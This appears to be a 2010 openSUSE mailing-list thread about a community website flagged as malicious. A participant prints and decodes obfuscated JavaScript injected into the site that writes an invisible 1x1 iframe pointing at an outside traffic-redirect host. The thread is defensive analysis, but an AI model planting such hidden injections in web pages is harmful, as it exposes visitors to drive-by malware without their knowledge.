Hello, On Thu, 01 Jul 2010, Marcus Meissner wrote:
On Thu, Jul 01, 2010 at 06:35:44PM +0200, Cristian Morales Vega wrote:
2010/7/1 Andrea Florio
: Hash: SHA1
According to firefox/google, opensuse-community.org is a bad website... anything we can do??
The FAQ explains how it works: http://www.stopbadware.org/home/faq
But it's my understanding that it has already been reported: http://www.stopbadware.org/reports/8e9ba36718d9116809d178a7057d0f47
curl http://opensuse-community.org/Welcome_to_openSUSE-Community.org|less
The very first line looks truly like malware:
script language=JavaScript document.write(unescape('%3c'+'%73cri%70t language=Java%53cript%3edo'+'cu%6d%65n%74.write%28unesca%70%65%28%27%253c%69frame%25%320w%27+%27i%25%364%27+'+'%27%74h=1%20he%25%369g%27+%27%68t%253d1 %62%256f'+'%2572d%256'+'5r=%27+%270 %256%36%72amebo%2572'+'der%253%640 %257%33%2572c=%2527h%257%34%74%27+%27p:%252%66%2f%73uin'+'%2574%25%372a%256%36.co%256d/top%25310'+'%25%330/in%2e%63g%69%3f%34%2527%25%33e%253c%2f%256%39%66ram%256%35%253%65%27%29%29%3c/s'+'%63ript%3e'))
So it seems at a deeper look. $ jsshell js> unescape('%3c'+'%73cri%70t language=Java%53cript%3edo'+'cu%6d%65n%74.write%28unesca%70%65%28%27%253c%69frame%25%320w%27+%27i%25%364%27+'+'%27%74h=1%20he%25%369g%27+%27%68t%253d1 %62%256f'+'%2572d%256'+'5r=%27+%270 %256%36%72amebo%2572'+'der%253%640 %257%33%2572c=%2527h%257%34%74%27+%27p:%252%66%2f%73uin'+'%2574%25%372a%256%36.co%256d/top%25310'+'%25%330/in%2e%63g%69%3f%34%2527%25%33e%253c%2f%256%39%66ram%256%35%253%65%27%29%29%3c/s'+'%63ript%3e') <script language=JavaScript>document.write(unescape('%3ciframe%20w'+'i%64'+'th=1 he%69g'+'ht%3d1 b%6f%72d%65r='+'0 %66ramebo%72der%3d0 %73%72c=%27h%74t'+'p:%2f/suin%74%72a%66.co%6d/top%310%30/in.cgi?4%27%3e%3c/%69fram%65%3e'))</script> js> unescape('%3ciframe%20w'+'i%64'+'th=1 he%69g'+'ht%3d1 b%6f%72d%65r='+'0 %66ramebo%72der%3d0 %73%72c=%27h%74t'+'p:%2f/suin%74%72a%66.co%6d/top%310%30/in.cgi?4%27%3e%3c/%69fram%65%3e') <iframe width=1 height=1 border=0 frameborder=0 src='http://suintraf.com/top100/in.cgi?4'></iframe> js> So, it "injects" an "invisible" 1x1 iframe. The weird stuff is: http://suintraf.com/top100/in.cgi?4 redirects to linux.com, if you call it as a linux browser. But if you call it as e.g. an ie6, you get redirected to http://www.google.com/errors/asfe/system_down.html So, I guess depending on which browser you use (and whatever else) you could get redirected to a site where malware is, trying to be installed as drive-by-download or whatever. Anyway, JavaScript unescape orgies are always a bad sign. Please, tell the admins to reinstall from a clean source / backups. And webpin's index has been broken for quite a while anyway. -dnh PS: jsshell is part of libjs, no idea if oS/packman package it. -- [Stefan Wegmann sucht ein optisch ansprechendes Brennprogramm] Hhhhmmm, unter diesem Aspekt habe ich das ganze noch gar nicht betrachtet. Was würde denn Deinen gehobenen ästhetischen Ansprüchen entgegenkommen? Ein zartes Chartreuse im leicht fluffigen Kontrast zu einem frühlingshaften Ostereidottergelb? Mit Buttons im floralen Design und Chiffoneske Hilfsfenster mit einer luftig durchscheinenden Optik? [Thomas Templin in suse-linux] -- To unsubscribe, e-mail: opensuse-project+unsubscribe@opensuse.org For additional commands, e-mail: opensuse-project+help@opensuse.org